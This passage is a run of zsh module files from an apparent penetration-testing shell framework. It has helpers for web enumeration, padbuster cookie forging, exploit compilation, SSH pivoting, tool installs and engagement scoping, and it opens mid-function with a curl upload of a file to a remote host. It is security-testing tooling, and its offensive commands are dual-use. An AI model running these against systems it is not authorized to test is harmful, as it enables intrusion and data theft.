qq-vars-set-rhost
local f && __askpath f FILE $(pwd)
print -z "curl -L -T ${f} \"http://${__RHOST}/${f}\" "
}
qq-enum-web-vuln-padbuster-check() {
qq-vars-set-rhost
local cn && __askvar cn "COOKIE NAME"
local cv && __askvar cv "COOKIE VALUE"
print -z "padbuster ${__RHOST} ${cv} 8 -cookies ${cn}=${cv} -encoding 0"
}
qq-enum-web-vuln-padbuster-forge() {
qq-vars-set-rhost
local cn && __askvar cn "COOKIE NAME"
local cv && __askvar cv "COOKIE VALUE"
__check-user
print -z "padbuster ${__RHOST} ${cv} 8 -cookies ${cn}=${cv} -encoding 0 -plaintext user=${__USER}"
}
================================================
FILE: modules/qq-enum-web.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-web
#############################################################
qq-enum-web-help() {
cat << "DOC"
qq-enum-web
-----------
The qq-enum-web namespace contains commands for scanning and enumerating
http services.
Commands
--------
qq-enum-web-install: installs dependencies
qq-enum-web-tcpdump: capture traffic to and from a host
qq-enum-web-nmap-sweep: nmap sweep scan to discover web servers on a network
qq-enum-web-whatweb: enumerate web server and platform information
qq-enum-web-waf: enumerate WAF information
qq-enum-web-vhosts-gobuster: brute force for virtual hosts
qq-enum-web-eyewitness: scrape screenshots from target URL
qq-enum-web-wordpress: enumerate Wordpress information
qq-enum-web-headers: grab headers from a target url using curl
qq-enum-web-mirror: mirrors the target website locally
DOC
}
qq-enum-web-install() {
__info "Running $0..."
__pkgs tcpdump nmap whatweb wafw00f gobuster eyewitness wpscan wget curl seclists wordlists
go get -u github.com/jaeles-project/gospider
go get -u github.com/hakluke/hakrawler
}
qq-enum-web-nmap-sweep() {
__check-project
qq-vars-set-network
print -z "sudo nmap -n -Pn -sS -p80,443,8080 ${__NETWORK} -oA $(__netpath)/web-sweep"
}
qq-enum-web-tcpdump() {
__check-project
qq-vars-set-iface
qq-vars-set-rhost
print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 80 -w $(__hostpath)/web.pcap"
}
qq-enum-web-whatweb() {
__check-project
qq-vars-set-url
print -z "whatweb ${__URL} -a 3 | tee $(__urlpath)/whatweb.txt"
}
qq-enum-web-waf() {
__check-project
qq-vars-set-url
print -z "wafw00f ${__URL} -o $(__urlpath)/waf.txt"
}
# vhosts
qq-enum-web-vhosts-gobuster() {
__check-project
qq-vars-set-url
local w && __askpath w FILE /usr/share/seclists/Discovery/DNS/subdomains-top1mil-20000.txt
__check-threads
print -z "gobuster vhost -u ${__URL} -w ${w} -a \"${__UA}\" -t ${__THREADS} -o $(__urlpath)/vhosts.txt"
}
# screens
qq-enum-web-eyewitness() {
__check-project
qq-vars-set-url
mkdir -p $(__urlpath)/screens
print -z "eyewitness --web --no-dns --no-prompt --single ${__URL} -d $(__urlpath)/screens --user-agent \"${__UA}\" "
}
# apps
qq-enum-web-wordpress() {
__check-project
qq-vars-set-url
print -z "wpscan --ua \"${__UA}\" --url ${__URL} --enumerate tt,vt,u,vp -o $(__urlpath)/wpscan.txt"
}
qq-enum-web-headers() {
__check-project
qq-vars-set-url
print -z "curl -s -X GET -I -L -A \"${__UA}\" \"${__URL}\" | tee $(__urlpath)/headers.txt"
}
qq-enum-web-mirror() {
__warn "The destination site will be mirrored in the current directory"
qq-vars-set-url
print -z "wget -mkEpnp ${__URL} "
}
qq-enum-web-gospider() {
__check-project
qq-vars-set-url
print -z "gospider -s "${__URL}" -o $(__urlpath)/spider.txt"
}
qq-enum-web-hakrawler() {
__check-project
qq-vars-set-url
local d && __askvar d DEPTH
print -z "hakrawler -url "${__URL}" -depth ${d} -linkfinder -usewayback | tee $(__urlpath)/hakrawler.txt"
}
================================================
FILE: modules/qq-exploit.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-exploit
#############################################################
qq-exploit-help() {
cat << "DOC"
qq-exploit
----------
The exploit namespace provides commands that assist with compilation and
cross-compilation commands for exploits.
Commands
--------
qq-exploit-install: installs dependencies
qq-exploit-searchsploit-nmap: use searchsploit with an nmap xml results file
qq-exploit-compile-gcc: compile a linux exploit
qq-exploit-compile-gcc-32: compile a linux 32 exploit on 64
qq-exploit-compile-c-win32: cross compile a C win32 exploit
qq-exploit-compile-c-win64: cross compile a C wind64 exploit
qq-exploit-compile-c++-win32: cross compile a C++ win32 exploit
qq-exploit-compile-c++-win64: cross compile a C++ win64 exploit
DOC
}
qq-exploit-install() {
__info "Running $0..."
sudo dpkg --add-architecture i386
sudo apt-get update
__pkgs exploitdb
__pkgs mingw-w64 gcc gcc-multilib g++-multilib
}
qq-exploit-searchsploit-nmap() {
__check-project
__ask "Select nmap xml scan results file"
local f && __askpath f FILE ${__PROJECT}
print -z "searchsploit -x --nmap ${f}"
}
qq-exploit-compile-gcc() {
__check-project
mkdir -p ${__PROJECT}/exploits
local src && __askpath src SOURCE ${__PROJECT}/exploits
local out && __askpath out OUTPUT ${__PROJECT}/exploits
print -z "gcc -o ${out} ${src}"
}
qq-exploit-compile-gcc-32() {
__check-project
mkdir -p ${__PROJECT}/exploits
local src && __askpath src SOURCE ${__PROJECT}/exploits
local out && __askpath out OUTPUT ${__PROJECT}/exploits
print -z "gcc -m32 -o ${out} ${src}"
}
qq-exploit-compile-c-win32() {
__check-project
mkdir -p ${__PROJECT}/exploits
local src && __askpath src SOURCE ${__PROJECT}/exploits
local out && __askpath out OUTPUT ${__PROJECT}/exploits
print -z "i686-w64-mingw32-gcc ${src} -o ${out}"
}
qq-exploit-compile-c-win64() {
__check-project
mkdir -p ${__PROJECT}/exploits
local src && __askpath src SOURCE ${__PROJECT}/exploits
local out && __askpath out OUTPUT ${__PROJECT}/exploits
print -z "x86_64-w64-mingw32-gcc ${src} -o ${out}"
}
qq-exploit-compile-c++-win32() {
__check-project
mkdir -p ${__PROJECT}/exploits
local src && __askpath src SOURCE ${__PROJECT}/exploits
local out && __askpath out OUTPUT ${__PROJECT}/exploits
print -z "i686-w64-mingw32-g++ ${src} -o ${out}"
}
qq-exploit-compile-c++-win64() {
__check-project
mkdir -p ${__PROJECT}/exploits
local src && __askpath src SOURCE ${__PROJECT}/exploits
local out && __askpath out OUTPUT ${__PROJECT}/exploits
print -z "x86_64-w64-mingw32-g++ ${src} -o ${out}"
}
qq-exploit-compile-notes-winsock() {
__info "use -lws2_32"
}
qq-exploit-compile-notes-static() {
__info "-static-libstdc++"
__info "-static-libgcc"
}
================================================
FILE: modules/qq-install.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-install
#############################################################
qq-install-help() {
cat << "DOC"
qq-install
----------
The qq-install namespace provides commands that assist with installing
packages, repos and tools used in quiver.
Commands
--------
qq-install-all: Installs all dependecies in all modules, calling qq-*-install
qq-install-git-pull-tools: Updates all install tools that are git repos
qq-install-dev: Installs pyhton3, php, npm and libraries
qq-install-essentials: Installs useful utilities
qq-install-golang: Installs golang and environment variables needed for "go get"
Tools
-----
These installers are for individual tools.
qq-install-wordlist-commonspeak
qq-install-wordlist-nerdlist
qq-install-massdns
qq-install-github-search
qq-install-s3scanner
qq-install-git-secrets
qq-install-gitrob
qq-install-pentest-tools
qq-install-protonvpn
qq-install-nmap-elasticsearch-nse
qq-install-link-finder
qq-install-bat
DOC
}
##### Helpers
__addpath() {
echo "export PATH=\$PATH:$1" | tee -a ~/.zshrc
export PATH=$PATH:$1
}
__pkgs(){
__info "checking for and installing dependencies..."
for pkg in "$@"
do
__info "$pkg"
dpkg -l | grep -qw $pkg && __warn "already installed" || sudo apt-get -y install $pkg
done
}
qq-install-all() {
__cyan "This will install/update all modules."
__cyan "Ensure you have free disk space before proceeding."
__ask "CONTINUE?"
if __check-proceed
then
__info "Installing all modules..."
#qq-encoding-install
qq-enum-dhcp-install
qq-enum-dns-install
qq-enum-ftp-install
qq-enum-host-install
qq-enum-kerb-install
qq-enum-ldap-install
qq-enum-mssql-install
qq-enum-mysql-install
qq-enum-network-install
qq-enum-nfs-install
qq-enum-oracle-install
qq-enum-pop3-install
qq-enum-rdp-install
qq-enum-smb-install
qq-enum-web-aws-install
qq-enum-web-dirs-install
qq-enum-web-elastic-install
qq-enum-web-fuzz-install
qq-enum-web-js-install
qq-enum-web-vuln-install
qq-enum-web-php-install
qq-enum-web-ssl-install
qq-enum-web-install
qq-exploit-install
#qq-kali-install
qq-notes-install
qq-log-install
qq-pivot-install
qq-project-install
qq-recon-domains-install
qq-recon-github-install
qq-recon-networks-install
qq-recon-org-install
qq-recon-subs-install
qq-shell-handlers-msf-install
qq-shell-handlers-install
#qq-shell-tty-install
qq-srv-install
__info "Install finished"
fi
}
qq-install-git-pull-tools() {
__cyan "This will git-pull all repos in ${__TOOLS}."
__ask "CONTINUE?"
if __check-proceed
then
cd ${__TOOLS}
for d in $(ls -d */)
do
cd $d
__ok "Pulling ${d}"
git pull
cd -
done
cd ${__TOOLS}
fi
}
qq-install-dev(){
__cyan "This will python3, php, npm and libraries."
__ask "CONTINUE?"
if __check-proceed
then
__pkgs python3 python3-pip php php-curl libldns-dev libssl-dev libcurl4-openssl-dev npm
fi
}
qq-install-essentials(){
__cyan "This common utilities such as jq, tmux, tree, dtach and more."
__ask "CONTINUE?"
if __check-proceed
then
__pkgs jq pigz fonts-powerline unzip tmux dtach tree
fi
}
##### Individual Tools
qq-install-golang() {
__pkgs golang
if [[ -z "$(echo $GOPATH)" ]]
then
echo "export GOPATH=\$HOME/go" | tee -a $HOME/.zshrc
echo "export PATH=\$PATH:/usr/local/go/bin:\$GOPATH/bin" | tee -a $HOME/.zshrc
export GOPATH=$HOME/go
export PATH=$PATH:/usr/local/go/bin:$HOME/go/bin
fi
}
qq-install-node() {
__pkgs nodejs npm
cd $HOME
mkdir -p $HOME/.npm-global
npm config set prefix '~/.npm-global'
if ! $(echo $PATH | grep -q "npm-global")
then
echo "export PATH=\$PATH:\$HOME/.npm-global" | tee -a $HOME/.zshrc
export PATH=$PATH:$HOME/.npm-global
fi
}
qq-install-wordlist-commonspeak() {
local name="commonspeak2"
local url="https://github.com/assetnote/commonspeak2-wordlists.git"
local p="$__TOOLS/$name"
__info "$name"
if [[ ! -d $p ]]
then
git clone $url $p
else
__warn "already installed in $p"
pushd $p
git pull
popd
fi
}
qq-install-wordlist-nerdlist() {
local name="nerdlist"
local url="https://github.com/tarahmarie/nerdlist.git"
local p="$__TOOLS/$name"
__info "$name"
if [[ ! -d $p ]]
then
git clone $url $p
else
__warn "already installed in $p"
pushd $p
git pull
popd
fi
}
qq-install-massdns() {
local name="massdns"
local url="https://github.com/blechschmidt/massdns.git"
local p="$__TOOLS/$name"
__info "$name"
if [[ ! -d $p ]]
then
git clone $url $p
#after commands
pushd $p
make
popd
__addpath $p/bin
else
__warn "already installed in $p"
pushd $p
git pull
make
popd
fi
}
qq-install-github-search() {
local name="github-search"
local url="https://github.com/gwen001/github-search.git"
local p="$__TOOLS/$name"
__info "$name"
if [[ ! -d $p ]]
then
git clone $url $p
#after commands
pushd $p
pip3 install -r requirements.txt
popd
__addpath $p
else
__warn "already installed in $p"
pushd $p
git pull
pip3 install -r requirements.txt
popd
fi
}
qq-install-s3scanner() {
local name="S3Scanner"
local url="https://github.com/sa7mon/S3Scanner.git"
local p="$__TOOLS/$name"
__info "$name"
if [[ ! -d $p ]]
then
git clone $url $p
#after commands
pushd $p
pip3 install -r requirements.txt
popd
__addpath $p
else
__warn "already installed in $p"
pushd $p
git pull
pip3 install -r requirements.txt
popd
fi
}
qq-install-gf() {
local name="gf"
__info "$name"
go get -u github.com/tomnomnom/gf
echo "source \$GOPATH/src/github.com/tomnomnom/gf/gf-completion.zsh" >> $HOME/.zshrc
cp -r $GOPATH/src/github.com/tomnomnom/gf/examples $HOME/.gf
}
qq-install-git-secrets() {
local name="git-secrets"
local url="https://github.com/awslabs/git-secrets.git"
local p="$__TOOLS/$name"
__info "$name"
if [[ ! -d $p ]]
then
git clone $url $p
#after commands
pushd $p
sudo make install
popd
__addpath $p
else
__warn "already installed in $p"
pushd $p
git pull
sudo make install
popd
fi
}
qq-install-gitrob() {
local name="gitrob"
__info "$name"
go get -u github.com/golang/dep/cmd/dep
go get -u github.com/codeEmitter/gitrob
pushd ~/go/src/github.com/codeEmitter/gitrob
dep ensure
go build
popd
}
qq-install-pentest-tools() {
local name="pentest-tools"
local url="https://github.com/gwen001/pentest-tools.git"
local p="$__TOOLS/$name"
__info "$name"
if [[ ! -d $p ]]
then
git clone $url $p
#after commands
__addpath $p
else
__warn "already installed in $p"
pushd $p
git pull
popd
fi
}
qq-install-protonvpn() {
local name="protonvpn"
__info "$name"
sudo apt install -y openvpn dialog python3-pip python3-setuptools
sudo pip3 install protonvpn-cli
__warn "ProtonVPN username and password required"
print -z "sudo protonvpn init"
}
qq-install-nmap-elasticsearch-nse() {
local name="nmap-elasticsearch-nse"
local url="https://github.com/theMiddleBlue/nmap-elasticsearch-nse.git"
local p="$__TOOLS/$name"
__info "$name"
if [[ ! -d $p ]]
then
git clone $url $p
#after commands
pushd $p
sudo cp elasticsearch.nse /usr/share/nmap/scripts/
popd
else
__warn "already installed in $p"
pushd $p
git pull
sudo cp elasticsearch.nse /usr/share/nmap/scripts/
popd
fi
}
qq-install-link-finder() {
local name="LinkFinder"
local url="https://github.com/GerbenJavado/LinkFinder.git"
local p="$__TOOLS/$name"
__info "$name"
if [[ ! -d $p ]]
then
git clone $url $p
#after commands
pushd $p
sudo python3 setup.py install
pip3 install -r requirements.txt
popd
else
__warn "already installed in $p"
pushd $p
git pull
python3 setup.py install
pip3 install -r requirements.txt
popd
fi
}
qq-install-bat() {
local name="bat"
__info "$name"
cd $HOME
wget https://github.com/sharkdp/bat/releases/download/v0.15.0/bat_0.15.0_amd64.deb
sudo dpkg -i bat_0.15.0_amd64.deb
rm bat_0.15.0_amd64.deb
cd -
}
================================================
FILE: modules/qq-kali.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-kali
#############################################################
qq-kali-help() {
cat << "DOC"
qq-kali
----------
The qq-kali namespace provides commands that assist with managing Kali linux.
Commands
--------
qq-kali-pkg-upgrade: update and full-upgrade with autoremove
qq-kali-pkg-query: query if a package is installed or not
qq-kali-pkg-fix: fix broken packages
qq-kali-pkg-go-update: update go modules and packages with go get
qq-kali-fs-mounted: show mounted file systems
qq-kali-fs-usage: show file system usage totals
qq-kali-fs-last3: show files modified in last 3 days in /etc
qq-kali-fs-large: show files larger than 1GB in the root fs
qq-kali-mem-top10: show top10 processes by memory usage
qq-kali-mem-free: show overall memory usage
qq-kali-disk-top10: show top 10 files by size in current directory
qq-kali-ps-tree: show a process tree
qq-kali-ps-grep: search list of processes
qq-kali-ps-dtach: run a script in the background
qq-kali-net-watch: display network active connections
qq-kali-net-open4: display open network connections ipv4
qq-kali-net-open6: display open network connections ipv6
qq-kali-net-routes: display the system routing table
qq-kali-net-ss: display open network connections
qq-kali-net-lsof: display open network connections
qq-kali-net-pubip: query for the public IP
qq-kali-pvpn-update: install or update proton vpn cli
qq-kali-pvpn-status: check proton vpn status
qq-kali-pvpn-connect-tcp: connect to proton vpn using tcp
qq-kali-pvpn-connect-udp: connect to proton vpn using udp
qq-kali-pvpn-disconnect: disconnect proton vpn
qq-kali-path-add: add a new path to the PATH environment variable
qq-kali-file-replace: replace an existing value in a file
qq-kali-file-dos-to-unix: convert file with dos endings to unix
qq-kali-file-unix-to-dos: convert file with unix endings to dos
qq-kali-file-sort-uniq: sort a file uniq in place
qq-kali-file-sort-uniq-ip: sort a file of IP addresses uniq in place
qq-kali-sudoers-easy: removes the requirment for sudo for common commands like nmap
qq-kali-sudoers-harden: removes sudo exclusions
DOC
}
qq-kali-pkg-upgrade() { print -z "sudo apt-get update && sudo apt-get full-upgrade && sudo apt-get autoremove" }
qq-kali-pkg-query() {
local query && __askvar query PACKAGE
for pkg in "${query}"
do
dpkg -l | grep -qw $pkg && __ok "${pkg} is installed" || __warn "${pkg} not installed"
done
}
qq-kali-pkg-fix() { print -z "sudo apt-get install --fix-broken && sudo apt-get autoremove && sudo apt-get update" }
qq-kali-pkg-go-update() { print -z "go get -u all" }
qq-kali-fs-mounted() { print -z "sudo mount | column -t" }
qq-kali-fs-usage() { print -z "df -mTh --total" }
qq-kali-fs-last3() { print -z "sudo find /etc -mtime -3" }
qq-kali-fs-large() { print -z "sudo find / -type f -size +1G" }
qq-kali-mem-top10() { print -z "sudo ps aux | sort -rk 4,4 | head -n 10 | awk '{print \$4,\$11}' " }
qq-kali-mem-free() { print -z "free -th" }
qq-kali-disk-top10() { print -z "sudo du -sk ./* | sort -r -n | head -10" }
qq-kali-ps-tree() { print -z "ps auxf" }
qq-kali-ps-grep() {
local query && __askvar query QUERY
print -z "ps aux | grep -v grep | grep -i -e VSZ -e ${query}"
}
qq-kali-ps-dtach() {
__ask "Enter full path to script to run dtach'd"
local p && __askpath p PATH $(pwd)
dtach -A ${p} /bin/zsh
}
qq-kali-net-watch() { print -z "sudo watch -n 0.3 'netstat -pantlu4 | grep \"ESTABLISHED\|LISTEN\"' " }
qq-kali-net-open4() { print -z "sudo netstat -pantlu4"}
qq-kali-net-open6() { print -z "sudo netstat -pantlu6"}
qq-kali-net-routes() { print -z "netstat -r --numeric-hosts" }
qq-kali-net-ss() { print -z "sudo ss -plaunt4" }
qq-kali-net-lsof() { print -z "sudo lsof -P -i -n "}
qq-kali-net-pubip() { print -z "curl -s \"https://icanhazip.com\" "}
qq-kali-pvpn-update() { print -z "sudo pip3 install protonvpn-cli --upgrade" }
qq-kali-pvpn-status() { print -z "sudo protonvpn status" }
qq-kali-pvpn-connect-tcp() { print -z "sudo protonvpn c -f" }
qq-kali-pvpn-connect-udp() { print -z "sudo protonvpn c -f -p udp" }
qq-kali-pvpn-disconnect() { print -z "sudo protonvpn disconnect" }
qq-kali-path-add() {
__ask "Enter new path to append to current PATH"
local p && __askpath p PATH /
print -z "echo \"export PATH=\$PATH:${p}\" | tee -a $HOME/.zshrc"
}
qq-kali-file-replace() {
local replace && __askvar replace REPLACE
local with && __askvar with WITH
local file && __askpath file FILE $(pwd)
print -z "sed 's/${replace}/${with}/g' ${file} > ${file}"
}
qq-kali-file-dos-to-unix() {
local file=$1
[[ -z "${file}" ]] && __askpath file FILE $(pwd)
print -z "tr -d \"\015\" < ${file} > ${file}.unix"
}
qq-kali-file-unix-to-dos() {
local file=$1
[[ -z "${file}" ]] && __askpath file FILE $(pwd)
print -z "sed -e 's/$/\r/' ${file} > ${file}.dos"
}
qq-kali-file-sort-uniq() {
local file=$1
[[ -z "${file}" ]] && __askpath file FILE $(pwd)
print -z "cat ${file} | sort -u -o ${file}"
}
qq-kali-file-sort-uniq-ip() {
local file=$1
[[ -z "${file}" ]] && __askpath file FILE $(pwd)
print -z "cat ${file} | sort -u | sort -V -o ${file}"
}
qq-kali-sudoers-easy() {
__warn "This is dangerous for OPSEC! Remove when done."
print -z "echo \"$USER ALL=(ALL:ALL) NOPASSWD: /usr/bin/nmap, /usr/bin/masscan, /usr/sbin/tcpdump\" | sudo tee /etc/sudoers.d/$(whoami)"
}
alias easymode="qq-bounty-sudoers-easy"
qq-kali-sudoers-harden() {
print -z "sudo rm /etc/sudoers.d/$(whoami)"
}
alias hardmode="qq-bounty-sudoers-harden"
================================================
FILE: modules/qq-log.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-log
#############################################################
qq-log-help() {
cat << "DOC"
qq-log
-------------
The log namespace provides commands that create a logbook in
a directory specified by the __LOGBOOK variable. Use qq-log to append entries
to the logbook. Display the log with qq-log-cat. Edit the log
with qq-log-edit.
Commands
--------
qq-log-install: installs dependencies
qq-log: alias ql, appends $@ to an entry in the logbook
qq-log-cat: alias qlc, cats the logbook
qq-log-edit: alias qle, edits the logbook using $EDITOR
qq-log-set: creates or uses existing logbook.md in the path specified
DOC
}
qq-log-install() {
__info "Running $0..."
qq-install-golang
go get -u github.com/charmbracelet/glow
}
qq-log-set() {
qq-vars-set-logbook
}
alias qls="qq-log-set"
qq-log-cat() {
__check-logbook
__info "${__LOGBOOK}"
glow ${__LOGBOOK}
}
alias qlc="qq-log-cat"
qq-log-edit() {
__check-logbook
$EDITOR ${__LOGBOOK}
}
alias qle="qq-log-edit"
qq-log() {
__check-logbook
local stamp=$(date +'%m-%d-%Y : %r')
echo "## ${stamp}" >> ${__LOGBOOK}
echo "\`\`\`" >> ${__LOGBOOK}
echo "$@" >> ${__LOGBOOK}
echo "\`\`\`" >> ${__LOGBOOK}
echo " " >> ${__LOGBOOK}
}
alias ql="qq-log"
================================================
FILE: modules/qq-notes.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-notes
#############################################################
qq-notes-help() {
cat << "DOC"
qq-notes
-------
The notes namespace provides searching and reading of markdown notes that are
stored in a directory specified by the __NOTES environment variable (qq-vars-global).
Commands
--------
qq-notes-install: installs dependencies
qq-notes: lists all notes in $__NOTES or searches notes by filename if $1 is supplied
qq-notes-content: list all notes in $__NOTES or searches notes by content if $1 is supplied
qq-notes-menu: display an interactive menu for reading notes
DOC
}
qq-notes-install() {
__info "Running $0..."
__pkgs fzf ripgrep
qq-install-golang
go get -u github.com/charmbracelet/glow
qq-install-bat
}
qq-notes() {
__notes-check
__info "Use \$1 to search file names"
select note in $(ls -R --file-type ${__NOTES} | grep -ie ".md$" | grep -i "$1")
do test -n ${note} && break
exit
done
[[ ! -z ${note} ]] && glow ${__NOTES}/${note}
}
qq-notes-content() {
__notes-check
__info "Use \$1 to search content"
select note in $(grep -rliw "$1" ${__NOTES}/*.md)
do test -n ${note} && break
exit
done
[[ ! -z ${note} ]] && glow ${note}
}
qq-notes-menu() {
__notes-check
pushd ${__NOTES} &> /dev/null
rg --no-heading --no-line-number --with-filename --color=always --sort path -m1 "" *.md | fzf --tac --no-sort -d ':' --ansi --preview-window wrap --preview 'bat --style=plain --color=always ${1}'
popd &> /dev/null
}
================================================
FILE: modules/qq-pivot.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-pivot
#############################################################
qq-pivot-help() {
cat << "DOC"
qq-pivot
------------
The pivot namespace provides commands for using ssh to proxy and pivot.
Commands
--------
qq-pivot-install: installs dependencies
qq-pivot-mount-remote-sshfs: mounts a remote directory to local /mnt path using sshfs
qq-pivot-ssh-dynamic-proxy: uses remote as a dynamic proxy
qq-pivot-ssh-remote-to-local: forwards remote port to local port
qq-pivot-ssh-remote-to-local-burp: forwards remote port 8080 to local port 8080
DOC
}
qq-pivot-install() {
__info "Running $0..."
__pkgs sshfs rsync
}
qq-pivot-mount-remote-sshfs() {
__check-user
local lm && __askpath lm LMOUNT /mnt
local rm && __askvar rm RMOUNT /
qq-vars-set-rhost
mkdir -p ${lm}
print -z "sshfs ${__USER}@${__RHOST}:${rm} ${lm}"
}
qq-pivot-ssh-dynamic-proxy() {
__check-user
qq-vars-set-rhost
qq-vars-set-lport
print -z "ssh -D ${__LPORT} -CqN ${__USER}@${__RHOST}"
}
qq-pivot-ssh-remote-to-local() {
__check-user
qq-vars-set-rhost
qq-vars-set-rport
qq-vars-set-lport
print -z "ssh -R ${__LPORT}:127.0.0.1:${__RPORT} ${__USER}@${__RHOST}"
}
qq-pivot-ssh-remote-to-local-burp() {
__check-user
qq-vars-set-rhost
print -z "ssh -R 8080:127.0.0.1:8080 ${__USER}@${__RHOST}"
}
================================================
FILE: modules/qq-project-custom.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-project-custom
#############################################################
qq-project-custom-help() {
cat << "DOC"
qq-project-custom
-----------------
The qq-project-custom namespace provides commands to setup custom project
directory structures and variables for users that have specific requirements.
Variables
---------
__PROJECT_ZD_CONSULTANT: a global variable for consultant name used in ZD projects
__PROJECT_ZD_ROOT: a global variable for the project root folder used in ZD projects
Commands
--------
qq-project-custom-zd-start: scaffolds directory structure and logbook for "zd" projects
qq-project-custom-zd-end: zips and removes directories and data for "zd" projects
qq-project-custom-zd-root-set: sets the __PROJECT_ZD_ROOT variable
qq-project-custom-zd-consultant-set: sets the __PROJECT_ZD_CONSULTANT variable
DOC
}
export __PROJECT_ZD=""
export __PROJECT_ZD_CONSULTANT="$(cat ${__GLOBALS}/__PROJECT_ZD_CONSULTANT 2> /dev/null)"
export __PROJECT_ZD_ROOT="$(cat ${__GLOBALS}/__PROJECT_ZD_ROOT 2> /dev/null)"
__check-project-zd() {
if [[ -z $__PROJECT_ZD_CONSULTANT ]]
then
qq-project-custom-zd-root-set
fi
if [[ -z $__PROJECT_ZD_ROOT ]]
then
qq-project-custom-zd-consultant-set
fi
}
qq-project-custom-zd-root-set() {
__warn "Enter the full path to the root folder of your projects."
__prefill __PROJECT_ZD_ROOT DIR $HOME
echo "${__PROJECT_ZD_ROOT}" > ${__GLOBALS}/PROJECT_ZD_ROOT
}
qq-project-custom-zd-consultant-set() {
__warn "Enter consultant name below."
__askvar __PROJECT_ZD_CONSULTANT NAME
echo "${__PROJECT_ZD_CONSULTANT}" > ${__GLOBALS}/PROJECT_ZD_CONSULTANT
}
qq-project-custom-zd-start() {
__check-project-zd
local pid && __askvar pid "PROJECT ID"
local pname && __askvar pname "PROJECT NAME"
local fname="${pid}-${pname}-${__CONSULTANT_NAME// /}"
local fullpath=${__PROJECT_ROOT}/${fname}
#scaffold
mkdir -p ${fullpath}/{burp/{log,intruder,http-requests},client-supplied-info/emails,files/{downloads,uploads},notes/screenshots,scans/{raw,pretty},ssl,tool-output}
#set project to be tool-output
__PROJECT=${fullpath}/tool-output
# wanted this to be an optional step, sometimes I'll create folders in advance due to calls with clients ahead of the test or prep work
local setlog && read "setlog?$fg[cyan]Add a log file for this project (y/n)?:$reset_color "
case "$setlog" in
y|Y )
qq-log-set
;;
n|N )
echo "no"
;;
* )
echo ""
;;
esac
}
qq-project-custom-zd-end() {
__check-project-zd
__ask "Select a project folder: "
local pd=$(__menu $(find $__PROJECT_ROOT -mindepth 1 -maxdepth 1 -type d))
__ok "Selected: ${pd}"
# Task 1: delete all empty folders
local df && read "df?$fg[cyan]Delete empty folders? (Y/n)?:$reset_color "
if [[ "$df" =~ ^[Yy]$ ]]
then
find ${pd} -type d -empty -delete
__ok "Empty folders deleted."
fi
# Task 2: create tree
cd ${pd}
tree -C -F -H ./ > ${pd}/tree.html
[[ -f "${pd}/tree.html" ]] && __ok "Created ${pd}/tree.html." || __err "Failed creating ${pd}/tree.html"
cd - > /dev/null 2>&1
# Task 3: zip up engagement folder
local zf=$(basename ${pd})
7z a -t7z -m0=lzma2 -mx=9 -mfb=64 -md=1024m -ms=on ${__PROJECT_ROOT}/${zf}.7z ${pd} > /dev/null 2>&1
[[ -f ${__PROJECT_ROOT}/${zf}.7z ]] && __ok "Zipped files into ${__PROJECT_ROOT}/${zf}.7z." || __err "Failed to zip ${pd}"
# Task 4: Delete engagement folder
local rmp && read "rmp?$fg[cyan]Delete project folder? (Y/n)?:$reset_color "
if [[ "${rmp}" =~ ^[Yy]$ ]] && print -z "rm -rf ${pd}"
__ok "Project ended."
}
================================================
FILE: modules/qq-project.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-project
#############################################################
qq-project-help() {
cat << "DOC"
qq-project
----------
The project namespace provides commands that help with setting
up scope for an engagement or bug bounty, as well as commands for
syncing data and managing a VPS.
Commands
--------
qq-project-install: installs dependencies
qq-project-scope: generate a scope regex by root word (matches all to the left and right)
qq-project-rescope-txt: uses rescope to generate scope from a url
qq-project-rescope-burp: uses rescope to generate burp scope (JSON) from a url
qq-project-sync-remote-to-local: sync data from a remote server directory to a local directory using SSHFS
qq-project-sync-local-file-to-remote: sync a local file to a remote server using rsync over SSH
qq-project-google-domain-dyn: update IP address using Google domains hosted dynamic record
DOC
}
qq-project-install() {
__info "Running $0..."
__pkgs fusermount sshfs rsync curl
qq-install-golang
go get -u github.com/root4loot/rescope
}
qq-project-scope() {
__check-project
__check-org
print -z "echo \"^.*?${__ORG}\..*\$ \" >> ${__PROJECT}/scope.txt"
}
qq-project-rescope-burp() {
__check-project
__ask "Enter the URL to the bug bounty scope description"
qq-vars-set-url
mkdir -p ${__PROJECT}/burp
print -z "rescope --burp -u ${__URL} -o ${__PROJECT}/burp/scope.json"
}
qq-project-sync-remote-to-local() {
__warn "Enter your SSH connection username@remote_host"
local ssh && __askvar ssh SSH
__warn "Enter the full remote path to the directory your want to copy from"
local rdir && __askvar rdir "REMOTE DIR"
__warn "Enter the full local path to the directory to use as a mount point"
local mnt && __askpath mnt "LOCAL MOUNT" /mnt
__warn "Enter the full local path to the directory to sync the data to"
local ldir && __askpath lidr "LOCAL DIR" $HOME
sudo mkdir -p $mnt
__ok "Mounting $rdir to $mnt ..."
sudo sshfs ${ssh}:${rdir} ${mnt}
__ok "Syncing data from $mnt to $ldir ..."
sudo rsync -avuc ${mnt} ${ldir}
__ok "Unmounting $mnt. ..."
sudo fusermount -u ${mnt}
__ok "Sync Completed"
}
qq-project-sync-local-file-to-remote() {
__warn "Enter your SSH connection username@remote_host"
local ssh && __askvar ssh SSH
__warn "Enter the full local path to the file you want to copy to your remote server"
local lfile && __askpath lfile "LOCAL FILE" $HOME
__warn "Enter the full remote path to the directory your want to copy the file to"
local rdir && __askvar rdir "REMOTE DIR"
print -z "rsync -avz -e \"ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null\" --progress $lfile $ssh:$rdir"
}
qq-project-google-domain-dyn() {
local u && __askvar u USERNAME
local p && __askvar p PASSWORD
local d && __askvar d DOMAIN
qq-vars-set-lhost
print -z "curl -s -a \"${__UA}\" https://$u:$p@domains.google.com/nic/update?hostname=${d}&myip=${__LHOST} "
}
================================================
FILE: modules/qq-recon-domains.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-recon-domains
#############################################################
qq-recon-domains-help() {
cat << "DOC"
qq-recon-domains
-------------
